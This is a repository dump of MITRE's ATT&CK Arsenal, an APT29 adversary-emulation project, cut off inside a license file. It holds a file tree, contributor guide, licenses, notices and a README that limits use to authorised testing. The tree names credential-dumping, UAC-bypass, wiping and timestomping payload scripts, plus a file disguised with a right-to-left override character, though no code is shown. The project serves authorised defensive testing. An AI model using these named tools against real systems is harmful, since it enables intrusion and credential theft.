├── CONTRIBUTING.md ├── LICENSE.txt ├── NOTICE.txt ├── README.md └── adversary_emulation └── APT29 ├── NOTICE.txt ├── CALDERA_DIY └── evals │ ├── ISSUES.md │ ├── LICENSE │ ├── README.md │ ├── app │ ├── gui_api.py │ └── parsers │ │ ├── ntlm.py │ │ ├── sessionid.py │ │ └── sid.py │ ├── data │ ├── abilities │ │ ├── collection │ │ │ ├── 0b1841bd-ef8b-475c-bce7-8fcb2860984a.yml │ │ │ ├── 5692da31-3586-4e4f-8f07-5750070c730b.yml │ │ │ ├── a4b14c10-49aa-4ae4-b165-d5a37364fe62.yml │ │ │ ├── a81ea4ad-bc9f-49a7-82d4-4466df641487.yml │ │ │ ├── b1dcc53a-c86c-46ba-8a3d-e1da74a8db3c.yml │ │ │ ├── db28f68d-e8b8-46e6-b680-642570d4b257.yml │ │ │ ├── ee4c2eab-be57-434c-a32c-14b77360301a.yml │ │ │ └── fc231955-774f-442c-ac0e-e74dfda50c5c.yml │ │ ├── credential-access │ │ │ ├── 1dba454c-0e4f-4fe0-8bc9-b17e8c5c9a24.yml │ │ │ ├── 267bad86-3f06-49f1-9a3e-6522f2a61e7a.yml │ │ │ ├── 4ef6009d-2d62-4bb4-8de9-0458df2e9567.yml │ │ │ ├── c4f4b13c-87b6-498c-b814-93570173068c.yml │ │ │ ├── e7cab9bb-3e3a-4d93-99cc-3593c1dc8c6d.yml │ │ │ └── effbedc1-1bc8-4a75-9395-980559700008.yml │ │ ├── defensive-evasion │ │ │ ├── 03afada1-1714-408f-bde5-f528b91dc89d.yml │ │ │ ├── 208b021b-c79a-4176-8ad1-3af99ed50c6f.yml │ │ │ ├── 4a2ad84e-a93a-4b2e-b1f0-c354d6a41278.yml │ │ │ ├── 4bedbd9b-a570-4f9f-b78a-2f7f99ad5e92.yml │ │ │ ├── 5226e5dc-fc28-43b7-a679-0db49d520402.yml │ │ │ ├── 5ff80022-8d85-410b-b868-6c7565b267e5.yml │ │ │ ├── 68b588bc-002a-42dc-bac7-9189f944065b.yml │ │ │ └── 9b5b5aec-32ff-4d74-8555-727b50ab15f6.yml │ │ ├── discovery │ │ │ ├── 0cfadbcb-ec21-44ae-adb7-9a23176dd620.yml │ │ │ ├── 144b1384-5060-494f-80eb-91772695cdf3.yml │ │ │ ├── 1c8552c7-f7ed-4523-b640-72d65af5f855.yml │ │ │ ├── 24ed020e-4730-4000-b6b4-6b5d3e95314f.yml │ │ │ ├── 26181249-be75-41ed-9fe7-5c30ea8c2d4d.yml │ │ │ ├── 2b5a72b1-01e4-48ae-98b0-2570a7894371.yml │ │ │ ├── 2ff877b4-0c00-401e-9d3f-070c70b610df.yml │ │ │ ├── 35d95b64-c1f8-4ac7-a2f2-8959218239cd.yml │ │ │ ├── 41610306-087c-4c34-874b-37b8ed633a36.yml │ │ │ ├── 
59592c35-8207-4896-8d8b-36ad4600245d.yml │ │ │ ├── 5c23f638-9cfc-4fc4-9cab-4af628fef70a.yml │ │ │ ├── 5df12481-9d8c-4235-b550-9cefc8ed7361.yml │ │ │ ├── 5f4263c4-7ff1-4098-b5f5-f41faa31cf5b.yml │ │ │ ├── 61221fb9-cb32-46d5-98fd-90567a621526.yml │ │ │ ├── 646be6c9-f27a-4f5f-be5d-b8a0317e215f.yml │ │ │ ├── 64f1fcb4-399d-4f3b-9a6b-13ec00e1c2ce.yml │ │ │ ├── 6f1f4768-7099-45d2-a858-b49dc792234e.yml │ │ │ ├── 7c2a6e5b-1adb-464f-a581-4677391f8dd6.yml │ │ │ ├── 84377d7a-0363-44fd-a082-44657ca1858f.yml │ │ │ ├── 96140694-6d13-40b6-9553-0e63533469f3.yml │ │ │ ├── 9ce5bf9f-44ec-44c4-bbe0-6d68a83e1b76.yml │ │ │ ├── a34ab8f2-a106-41fb-af0b-cf5382bd18ae.yml │ │ │ ├── a42be479-fc26-4d7c-9e63-7a9b74e4c8d2.yml │ │ │ ├── ba0b398d-91b8-490a-bed2-f959afa8e1aa.yml │ │ │ ├── d2ea2676-7f85-4228-b980-ab3c0e1adc03.yml │ │ │ ├── d5170a60-3bdc-44e0-9870-a38db5c0cf81.yml │ │ │ ├── ee08a427-1e1d-4d8a-aeb1-978a7fcf9087.yml │ │ │ ├── f320eebd-e75b-4194-b529-79e64ad0b9ee.yml │ │ │ ├── f9c0b150-822f-497b-ad6d-187f24561e9a.yml │ │ │ └── faa96e7f-081a-40b7-a743-a6a7f2627ea3.yml │ │ ├── execution │ │ │ ├── 08e57385-dbce-4850-8bb7-589ef79465ab.yml │ │ │ ├── 571845f6-b75c-4b9d-a666-a78f7827261f.yml │ │ │ ├── 95564347-e77a-4a89-b08f-dcafa5468f2c.yml │ │ │ ├── a5daa530-c640-49bc-aa54-6808789a684a.yml │ │ │ ├── c4a59e39-53b0-4ace-9528-8ff052752ece.yml │ │ │ └── e506f811-884d-4992-aacb-514b33a0324f.yml │ │ ├── exfiltration │ │ │ ├── 2d18c8ec-4593-49dc-9bf4-11d0673d6ae6.yml │ │ │ ├── 4840d6dd-da13-401a-be46-05db56f4e1e0.yml │ │ │ ├── 68e209dd-f354-4adc-8bc6-e85a3e55a7f4.yml │ │ │ └── a612311d-a802-48da-bb7f-88a4b9dd7a24.yml │ │ ├── host-provision │ │ │ └── 865b6ad9-ba59-435a-bd8f-641052fc077a.yml │ │ ├── impact │ │ │ ├── 4b2e9574-b1a7-4b38-95b2-6054ded9c4fe.yml │ │ │ └── f820b93d-6176-4a72-a138-a70b0b549c49.yml │ │ ├── lateral-movement │ │ │ ├── 00446217-53ca-4749-bacd-f41fe189d36e.yml │ │ │ ├── acecc8f7-18c2-41fd-87bc-39ffd644e4e9.yml │ │ │ └── bddc0abc-07a0-41b7-813f-e0c64d9226b3.yml │ │ ├── persistence 
│ │ │ ├── 43aad2d6-d16a-4adb-aa2b-9510a3be4c52.yml │ │ │ ├── 45f18b58-c14f-4b61-a3da-41b67af21429.yml │ │ │ ├── 9c75155e-21ab-4471-af16-45f3795a313c.yml │ │ │ └── afb8d8f7-d059-4825-95ae-c5727e2db320.yml │ │ ├── privilege-escalation │ │ │ ├── 088b8639-3f37-42cc-9dc8-01aabb645461.yml │ │ │ ├── 1345bff7-6f26-43b2-a92a-9aabccdb3db0.yml │ │ │ └── 89e9dffa-8836-4672-8cf3-bebd006d2a2b.yml │ │ └── stage-capabilities │ │ │ └── 4f7d21c9-ea31-4943-ad8a-efbbeeccdd7d.yml │ ├── adversaries │ │ ├── 148c819b-b022-43cb-a25c-3f6f5c71318d.yml │ │ ├── 3af0e59b-0d2a-48cd-b934-c46d5d1621d6.yml │ │ ├── 6dc5b558-c7bd-4835-860b-50e003399f8d.yml │ │ ├── 7916aaa3-f05d-453a-b632-f0f73b0865ce.yml │ │ ├── 80e9c544-c5ea-423d-b4f3-c0de3c2947ba.yml │ │ ├── 842d1d8e-a49d-4f11-9e97-79ce9d2f1732.yml │ │ ├── c9b6f5d3-ebde-4df1-9c15-ce1f339170c7.yml │ │ ├── d6115456-604a-4707-b30e-079dec5aad53.yml │ │ ├── e55da81a-9ce7-4da8-8313-074362fd5dee.yml │ │ └── ef93dd1b-809b-4a0b-b686-fef549cabbe4.yml │ └── sources │ │ └── 4fb34bde-b06d-445a-a146-8e35f79ce546.yml │ ├── hook.py │ ├── imgs │ ├── 0-caldera.png │ ├── 1-caldera.png │ ├── 10-caldera.png │ ├── 11-caldera.png │ ├── 12-caldera.png │ ├── 2-caldera.png │ ├── 3-caldera.png │ ├── 4-caldera.png │ ├── 5-caldera.png │ ├── 6-caldera.png │ ├── 7-caldera.png │ ├── 8-caldera.png │ ├── 9-caldera.png │ └── CALDERA-APT29-README.tar │ ├── payloads │ ├── 2016_United_States_presidential_election_-_Wikipedia.html │ ├── File-Collection.ps1 │ ├── Get-Screenshot.ps1 │ ├── Invoke-BypassUACTokenManipulation.ps1 │ ├── Invoke-Mimikatz.ps1 │ ├── Invoke-PSInject.ps1 │ ├── MITRE-ATTACK-EVALS.HTML │ ├── Modified-SysInternalsSuite.zip │ ├── README.md │ ├── StealToken.ps1 │ ├── dmevals.local.pfx │ ├── invoke-winrmsession.ps1 │ ├── m.exe │ ├── make_lnk.ps1 │ ├── monkey.png │ ├── powerview.ps1 │ ├── ps.ps1 │ ├── rar.exe │ ├── sandcat.go-windows │ ├── sandcat.go-windows-upx │ ├── schemas.ps1 │ ├── setup.py │ ├── stepFifteen_wmi.ps1 │ ├── stepFourteen_bypassUAC.ps1 │ ├── 
stepFourteen_credDump.ps1 │ ├── stepSeventeen_email.ps1 │ ├── stepSeventeen_zip.ps1 │ ├── stepSixteen_SID.ps1 │ ├── stepThirteen.ps1 │ ├── stepTwelve.ps1 │ ├── timestomp.ps1 │ ├── update.ps1 │ ├── upload.ps1 │ ├── wipe.ps1 │ └── ‮cod.3aka.scr.exe │ └── templates │ └── evals.html ├── Emulation_Plan ├── APT29_EmuPlan.pdf ├── APT29_Opflow.png ├── Day 1 │ ├── README.md │ ├── install_day1_tools.sh │ ├── payload_configs.md │ ├── payloads │ │ ├── Seaduke │ │ │ ├── python.exe │ │ │ ├── rar.exe │ │ │ └── sdelete64.exe │ │ ├── SysinternalsSuite │ │ │ ├── hostui.txt │ │ │ ├── javamtsup.exe │ │ │ ├── psversion.txt │ │ │ ├── readme.txt │ │ │ └── strings64.exe │ │ ├── cod.3aka3.scr │ │ ├── hostui.cpp │ │ ├── monkey.png │ │ └── shockwave.local.pfx │ └── rtlo.png ├── Day 2 │ ├── README.md │ └── payloads │ │ ├── 2016_United_States_presidential_election_-_Wikipedia.html │ │ ├── Invoke-Mimikatz.ps1 │ │ ├── Invoke-WinRMSession.ps1 │ │ ├── MITRE-ATTACK-EVALS.HTML │ │ ├── m │ │ ├── make_lnk.ps1 │ │ ├── powerview.ps1 │ │ ├── schemas.ps1 │ │ ├── stepFifteen_wmi.ps1 │ │ ├── stepFourteen_bypassUAC.ps1 │ │ ├── stepFourteen_credDump.ps1 │ │ ├── stepSeventeen_email.ps1 │ │ ├── stepSeventeen_zip.ps1 │ │ ├── stepSixteen_SID.ps1 │ │ ├── stepThirteen.ps1 │ │ ├── stepTwelve.ps1 │ │ ├── timestomp.ps1 │ │ └── wipe.ps1 └── README.md └── README.md /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # How to contribute 2 | 3 | Thanks for contributing to `attack-arsenal`! 4 | 5 | You are welcome to comment on issues, open new issues, and open pull requests. 6 | 7 | Pull requests should target the **develop** branch of the repository. 8 | 9 | Also, if you contribute any source code, we need you to agree to the following Developer's Certificate of Origin below. 
10 | 11 | ## Developer's Certificate of Origin v1.1 12 | 13 | ``` 14 | By making a contribution to this project, I certify that: 15 | 16 | (a) The contribution was created in whole or in part by me and I 17 | have the right to submit it under the open source license 18 | indicated in the file; or 19 | 20 | (b) The contribution is based upon previous work that, to the best 21 | of my knowledge, is covered under an appropriate open source 22 | license and I have the right under that license to submit that 23 | work with modifications, whether created in whole or in part 24 | by me, under the same open source license (unless I am 25 | permitted to submit under a different license), as indicated 26 | in the file; or 27 | 28 | (c) The contribution was provided directly to me by some other 29 | person who certified (a), (b) or (c) and I have not modified 30 | it. 31 | 32 | (d) I understand and agree that this project and the contribution 33 | are public and that a record of the contribution (including all 34 | personal information I submit with it, including my sign-off) is 35 | maintained indefinitely and may be redistributed consistent with 36 | this project or the open source license(s) involved. 37 | ``` -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 
14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 
47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. 
Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "{}" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. 
We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright 2020 Williams, Jamie C. 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /NOTICE.txt: -------------------------------------------------------------------------------- 1 | Copyright 2020 The MITRE Corporation 2 | 3 | Approved for Public Release; Distribution Unlimited. Case Number 19-1369. 4 | 5 | Licensed under the Apache License, Version 2.0 (the "License"); 6 | you may not use this file except in compliance with the License. 7 | You may obtain a copy of the License at 8 | 9 | http://www.apache.org/licenses/LICENSE-2.0 10 | 11 | Unless required by applicable law or agreed to in writing, software 12 | distributed under the License is distributed on an "AS IS" BASIS, 13 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | See the License for the specific language governing permissions and 15 | limitations under the License. 
16 | 17 | This project makes use of ATT&CK® 18 | ATT&CK Terms of Use — https://attack.mitre.org/resources/terms-of-use/ -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Welcome to the ATT&CK Arsenal 2 | 3 | This is a collection of red team and adversary emulation resources developed and released by MITRE. 4 | 5 | Content within ATT&CK Arsenal may align with, or be derived from, many efforts, including [ATT&CK](https://attack.mitre.org/), [ATT&CK Evaluations](https://attackevals.mitre.org/), or other threat-informed defense research initiatives. 6 | 7 | ## Liability / Responsible Usage 8 | 9 | This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research. 10 | 11 | ## Notice 12 | 13 | Copyright 2020 The MITRE Corporation 14 | 15 | Approved for Public Release; Distribution Unlimited. Case Number 19-1369. 16 | 17 | Licensed under the Apache License, Version 2.0 (the "License"); 18 | you may not use this file except in compliance with the License. 19 | You may obtain a copy of the License at 20 | 21 | http://www.apache.org/licenses/LICENSE-2.0 22 | 23 | Unless required by applicable law or agreed to in writing, software 24 | distributed under the License is distributed on an "AS IS" BASIS, 25 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 26 | See the License for the specific language governing permissions and 27 | limitations under the License. 
28 | 29 | This project makes use of ATT&CK® 30 | 31 | [ATT&CK Terms of Use](https://attack.mitre.org/resources/terms-of-use/) -------------------------------------------------------------------------------- /adversary_emulation/APT29/NOTICE.txt: -------------------------------------------------------------------------------- 1 | Copyright 2020 The MITRE Corporation 2 | 3 | Approved for Public Release; Distribution Unlimited. Case Number 19-03607-2. 4 | 5 | Licensed under the Apache License, Version 2.0 (the "License"); 6 | you may not use this file except in compliance with the License. 7 | You may obtain a copy of the License at 8 | 9 | http://www.apache.org/licenses/LICENSE-2.0 10 | 11 | Unless required by applicable law or agreed to in writing, software 12 | distributed under the License is distributed on an "AS IS" BASIS, 13 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | See the License for the specific language governing permissions and 15 | limitations under the License. 16 | 17 | This project makes use of ATT&CK® 18 | ATT&CK Terms of Use — https://attack.mitre.org/resources/terms-of-use/ 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/ISSUES.md: -------------------------------------------------------------------------------- 1 | ## How to Report an Issue 2 | Before reporting an issue on GitHub, be sure that: 3 | 4 | * you are using version 2.6.6 of CALDERA. 5 | * the issue has not already been reported. 6 | * you follow the example template below. 
7 | 8 | ``` 9 | ### Work environment 10 | * OS: 11 | * Golang Version: 12 | * Python Version: 13 | 14 | ### Expected behavior 15 | 16 | 17 | ### Actual behavior 18 | ``` 19 | -------------------------------------------------------------------------------- /adversary_emulation/APT29/CALDERA_DIY/evals/LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 
34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. 
Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such 